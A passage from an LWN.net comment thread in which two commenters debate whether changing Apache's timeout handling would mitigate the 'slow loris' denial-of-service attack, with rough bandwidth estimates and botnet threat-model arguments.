there are _many_ sites where this timeout needs to be set fairly large to accommodate #3, but that the timeouts for #1 and #2 could be _much_ shorter.
Apache attacked by a "slow loris"
Posted Jun 29, 2009 1:31 UTC (Mon) by njs (subscriber, #40338) [Link]
For instance, suppose that you have, somewhere on your web-site, a 1 megabyte file. Suppose that you set up your timeouts so that a people have to download at at least 5 KB/s or get cut off (locking out some modem users, but oh well). And suppose that you allow a maximum of 100 Apache worker processes.
If I download that file right at the minimum speed, then I can tie up one of those 100 worker processes for 204.8 seconds. To tie up all 100 of them indefinitely, I have to issue ~1 request every 2 seconds, and use 500 KB/s of bandwidth. That's trivially achievable from a residential connection.
I won't lock other users *quite* as badly as the full slow loris attack -- other connections will get a chance to be serviced once every 2 seconds! -- but it's near as makes no difference in practice.
So fiddling around with header timeouts or whatever might feel good, but isn't going to actually solve the problem, and thus is a waste of time.
Apache attacked by a "slow loris"
Posted Jun 29, 2009 7:24 UTC (Mon) by dlang (guest, #313) [Link]
if you have large files to download (or heavy CGI's to run), the attacker can overwelm you by sending small requests that generate huge responses (or in the case of the CGIs, small requests that take significant amounts of CPU time)
timeouts don't help in those cases, but allowing for a connection to tie up a slot for 300 seconds before it sends _any_ request is far worse. it doesn't take a broadband line to take down a server, dialup will do the job.
you use the example of 500K/sec of bandwidth to eat up 100 connections, with the default 300 second timeout you need to send 2 64 byte packets every 300 seconds to tie it up, so 100 connections is 6400 bytes * 8 bits/byte / 300 seconds or 170 bps, a thousand connections pushes 2k bps
now in reality the issue isn't when you have one attacker IP (that shows up and is easy to block), it's when you have thousands of attackers, and in that case even a small amount of bandwidth and CPU from each of them can overwhelm a server, and at that point it can become very hard to tell the attackers from legitimate users unless the attacker is dumb enough to do something that stands out
Apache attacked by a "slow loris"
Posted Jun 29, 2009 9:04 UTC (Mon) by njs (subscriber, #40338) [Link]
Yeah, so... is your argument that the Apache folks should do a bunch of work to patch a million of these holes to protect us against evil modem users? A fix that only protects us against evil modem users doesn't seem worth the effort.
> now in reality the issue isn't when you have one attacker IP (that shows up and is easy to block), it's when you have thousands of attackers, and in that case even a small amount of bandwidth and CPU from each of them can overwhelm a server, and at that point it can become very hard to tell the attackers from legitimate users unless the attacker is dumb enough to do something that stands out
Right -- this seems like a more realistic threat model. And how will fiddling with Apache's timeout handling, like you advocate, protect anyone from it?
Apache attacked by a "slow loris"
Posted Jun 29, 2009 9:36 UTC (Mon) by dlang (guest, #313) [Link]
I argue that using the same variable for
1. how long after a connection do I wait for a request
2. how long can the flow of data pause
3. what is the max length of time that a CGI can run, even if it is passing data continuously
is just bad design period, even if the attackers aren't taking advantage of it, these are three very different cases, and the appropriate values are very different between them. this affects the activity of a site even when it's not under attack.
if someone is out to get you and is willing to burn/use a large botnet to do it, they are going to get you. I don't care who you are, thousands of bots collectivly have more bandwidth than you do, so they can take you down by just doing legitimate things on your site.
the current situation is that trivial attacks can take apache down, at almost no cost to the attackers in terms of load. this means that they can do it on a botnet without doing anything that would make the owners of the machine notice that something is wrong.
fixing the timeouts so that each of the three cases above are handled seperatly would force the attacker to use significantly more bandwidth for their attack, this would either raise the possibility that the owners of the machines would notice something was wrong (because the letgitmate use is slow due to the load), or it would force the attackers to use much larger botnets. either of these would make it more expensive for the attacker